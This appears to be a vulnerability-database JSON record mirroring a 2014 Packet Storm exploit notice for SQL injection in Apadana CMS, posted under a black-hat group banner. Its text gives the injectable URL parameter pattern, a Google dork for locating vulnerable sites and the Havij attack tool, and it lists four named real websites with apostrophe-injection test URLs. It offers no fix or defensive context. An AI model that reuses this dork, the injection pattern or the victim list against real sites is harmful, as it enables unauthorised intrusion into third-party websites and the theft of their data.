{"id": "PACKETSTORM:129277", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Apadana CMS SQL Injection", "description": "", "published": "2014-11-26T00:00:00", "modified": "2014-11-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/129277/Apadana-CMS-SQL-Injection.html", "reporter": "SeRaVo.BlackHat", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:39", "viewCount": 10, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.9}, "sourceHref": "https://packetstormsecurity.com/files/download/129277/apadanacms-sql.txt", "sourceData": "`[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] \n[0] \n[0] Exploit Title : Apadana CMS Sql Injection Vulnerability \n[0] Exploit Author : SeRaVo.BlackHat \n[0] Vendor Homepage : http://www.apadanacms.ir/ \n[0] Google Dork : powered by apadana CMS \n[0] Date: 2014/November/25 \n[0] Tested On : windows + linux | Mozila | Havij \n[0] Software Link : http://www.itsecteam.com/products/havij-advanced-sql-injection/ \n[0] \n[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] \n[0] \n[0] :::::::::::::::::::::::::::::::::::::::::::::::::::::::: \n[0] ::: Apadana CMS Sql Injection Vulnerability ::: \n[0] :::::::::::::::::::::::::::::::::::::::::::::::::::::::: \n[0] ::: Iranian Cyber ARmy ~ Iranian Black Hat ::: \n[0] :::::::::::::::::::::::::::::::::::::::::::::::::::::::: \n[0] \n[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] \n[0] \n[0] :::::::::::::::: \n[0] ::::: DEMO ::::: \n[0] :::::::::::::::: \n[0] \n[0] Location : http://Target.com/?a=posts&b=category&c=[SQL] \n[0] \n[0] \n[0] :::::::::::::::: \n[0] ::::: ERROR :::: \n[0] :::::::::::::::: \n[0] \n[0] http://wa-swimming.ir/?a=posts&b=category&c=20 \n[0] http://wa-swimming.ir/?a=posts&b=category&c=20%27 \n[0] \n[0] http://beh-boshrooyeh.ir/?a=posts&b=102 \n[0] http://beh-boshrooyeh.ir/?a=posts&b=102%27 \n[0] \n[0] \n[0] http://www.kandimizbahloolabad.ir/?a=posts&b=1 \n[0] http://www.kandimizbahloolabad.ir/?a=posts&b=1%27 \n[0] \n[0] \n[0] http://padika.ir/?a=posts&b=category&c=1 \n[0] http://padika.ir/?a=posts&b=category&c=1%27 \n[0] \n[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] \n[0] \n[0] Discovered by : SeRaVo.BlackHat [0] Hassan [0] \n[0] \n[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] \n[0] \n[0] General.BlackHat@Gmail.com . FB.com/general.blackhat \n[0] \n[0] MY FRIEND'Z : Unhex.coder + #N3T + Lupin 13 + AMOK + Milad.Hacking + Mr.Time \n[0] SHD.N3T + MR.M@j!D + eb051 + Dr.SQ1 + Dr.3vil + RAMIN + ACC3SS + X3UR + 4li.BlackHat \n[0] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + IraQeN-H4XORZ \n[0] And All Iranian Cyber Army ...\\. \n[0] \n[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645459499}}
{}